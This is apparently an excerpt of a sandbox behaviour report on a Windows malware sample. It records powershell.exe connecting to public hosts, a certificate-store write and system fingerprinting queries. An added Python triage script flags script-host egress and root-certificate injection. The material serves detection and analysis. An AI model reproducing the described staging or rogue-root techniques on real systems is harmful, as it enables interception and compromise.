Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeProcess information set: NOOPENFILEERRORBOX
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Network Connect: 104.20.73.28 443
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Network Connect: 212.51.156.17 443
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Network Connect: 89.45.235.21 443
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Network Connect: 192.30.253.112 443
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Network Connect: 192.30.253.121 443
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Network Connect: 174.129.241.106 80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Network Connect: 93.184.221.200 443

Lowering of HIPS / PFW / Operating System Security Settings:

Adds / modifies Windows certificates
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4 Blob
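The two signatures above, "System process connects to network" and "Adds / modifies Windows certificates", are the ones worth turning into a triage rule, and they need a caveat. powershell.exe reaching public hosts on 443 and 80 is the download-and-stage behaviour to chase. A Blob written under SystemCertificates\AuthRoot\Certificates, however, is also exactly what Windows' automatic root update does the first time a chain ending in a not-yet-cached root is validated, so the thumbprint has to be checked against the Microsoft trusted-root list before the write is treated as a rogue root; a write under SystemCertificates\ROOT by a user-level program has no such routine explanation and is the classic root-injection pattern of banking trojans. The Python below is an added example, not part of Joe Sandbox or of the sample analysed here. It parses the report's "Source: ..." lines in the fused form shown on this page, groups script-host connections to public addresses, and rates certificate-store writes by store. The SCRIPT_HOSTS list and the severity labels are assumptions; the svchost.exe and bbtsvbq.exe rows in the sample input are constructed, every other sample row is copied from this report.

```python
"""Triage helper for Joe Sandbox behaviour lines.

Added example for this page, not part of Joe Sandbox or the analysed sample.
It parses the "Source: <process><observation>" rows of the report text and
turns two of the signatures into findings:
  * network connections made by script hosts (powershell.exe, mshta.exe, ...)
  * writes into the Windows certificate stores under
    HK..\SOFTWARE\Microsoft\SystemCertificates\<store>\Certificates\<thumbprint>
"""
import re
from collections import defaultdict
from ipaddress import ip_address

# Processes that rarely need Internet access on a workstation (assumed list).
SCRIPT_HOSTS = {"powershell.exe", "mshta.exe", "wscript.exe", "cscript.exe",
                "cmd.exe", "regsvr32.exe", "rundll32.exe", "csc.exe"}

# Report rows are extracted with the process path fused to the observation,
# so both patterns accept zero or more spaces between the two columns.
NET_LINE = re.compile(
    r"^Source:\s*(?P<image>.+?\.exe)\s*Network Connect:\s*"
    r"(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+(?P<port>\d{1,5})\s*$")
CERT_LINE = re.compile(
    r"^Source:\s*(?P<image>.+?\.exe)\s*Registry key created or modified:\s*"
    r"(?P<key>HKEY_[A-Z_]+\\.*?\\SystemCertificates\\(?P<store>[^\\]+)"
    r"\\Certificates\\(?P<thumb>[0-9A-Fa-f]{40}))\s+(?P<value>\S+)\s*$")


def image_name(path: str) -> str:
    """Basename of a Windows path, lower-cased for comparison."""
    return path.rsplit("\\", 1)[-1].lower()


def parse(lines):
    """Return (network, cert_writes) tuples found in the report lines."""
    network, cert_writes = [], []
    for raw in lines:
        line = raw.strip()
        m = NET_LINE.match(line)
        if m:
            network.append((image_name(m["image"]), m["ip"], int(m["port"])))
            continue
        m = CERT_LINE.match(line)
        if m:
            cert_writes.append((image_name(m["image"]), m["store"],
                                m["thumb"].upper(), m["value"]))
    return network, cert_writes


def script_host_egress(network):
    """Script hosts talking to public addresses, grouped per process image."""
    hits = defaultdict(set)
    for image, ip, port in network:
        if image in SCRIPT_HOSTS and ip_address(ip).is_global:
            hits[image].add((ip, port))
    return {image: sorted(dests) for image, dests in hits.items()}


def cert_store_findings(cert_writes):
    """Rate certificate-store writes; the target store decides the rating."""
    findings = []
    for image, store, thumb, value in cert_writes:
        if value.lower() != "blob":      # only the certificate payload matters
            continue
        if store.upper() == "ROOT":
            severity = "high"    # direct addition to Trusted Root CAs: MITM / banking-trojan pattern
        elif store.upper() == "AUTHROOT":
            severity = "verify"  # also populated by Windows' automatic root update; check the thumbprint
        else:
            severity = "info"
        findings.append({"image": image, "store": store,
                         "thumbprint": thumb, "severity": severity})
    return findings


def triage(lines):
    """Run both rules over raw report lines."""
    network, cert_writes = parse(lines)
    return {"script_host_egress": script_host_egress(network),
            "cert_store_writes": cert_store_findings(cert_writes)}


# Rows copied from this report, plus two constructed rows (marked) to show the
# benign-process filter and the high-severity ROOT-store path.
SAMPLE_LINES = [
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 104.20.73.28 443",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 212.51.156.17 443",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 89.45.235.21 443",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 192.30.253.112 443",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 192.30.253.121 443",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 174.129.241.106 80",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeNetwork Connect: 93.184.221.200 443",
    r"Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4 Blob",
    # constructed: a service talking to an internal host, must not be flagged
    r"Source: C:\Windows\System32\svchost.exe Network Connect: 10.0.0.5 445",
    # constructed: what a banking trojan leaves behind when it installs its own root
    r"Source: C:\Users\user\Desktop\bbtsvbq.exe Registry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\SystemCertificates\Root\Certificates\DEADBEEFDEADBEEFDEADBEEFDEADBEEFDEADBEEF Blob",
]

if __name__ == "__main__":
    import pprint
    pprint.pprint(triage(SAMPLE_LINES))
```

Run against the rows above it reports seven public destinations for powershell.exe, rates the AuthRoot write as "verify" and the constructed ROOT write as "high". The severity split is the point: escalate on ROOT immediately, and on AuthRoot only after the thumbprint fails to match a known public CA root.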

Language, Device and Operating System Detection:

Contains functionality to query local / system time (the API sequence below is the MSVC CRT stack-cookie initializer __security_init_cookie that the compiler links into every executable; on its own it is not evidence of timing or anti-analysis logic)
Source: C:\Users\user\Desktop\bbtsvbq.exe  Code function: 1_2_013B204B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,1_2_013B204B
Contains functionality to query windows version
Source: C:\ProgramData\7za.exe  Code function: 6_2_0046CF4C EntryPoint,GetVersion,6_2_0046CF4C
Queries the cryptographic machine GUID
Source: C:\Users\user\Desktop\bbtsvbq.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\bbtsvbq.exe  Code function: 1_2_013B1E2D cpuid 1_2_013B1E2D
Queries the installation date of Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation (×2)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation (×2)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.dll VolumeInformation (×2)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformation (×2)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll VolumeInformation (×2)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation (×2)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation (×2)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation (×2)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation (×2)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation (×2)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (×2)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Users\user~1\AppData\Local\Temp\2HVmGbfK7qLuRZ\lib\net20\Microsoft.Win32.TaskScheduler.dll VolumeInformation (×2)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation (×2)
Source: C:\ProgramData\VitBTKxRu\OZEImhRAzl\socat.exe  Queries volume information: C:\ProgramData\VitBTKxRu VolumeInformation (×4)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation (×2)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation (×2)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.dll VolumeInformation (×2)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformation (×2)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Runtime.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Management\2.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Diagnostics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformation
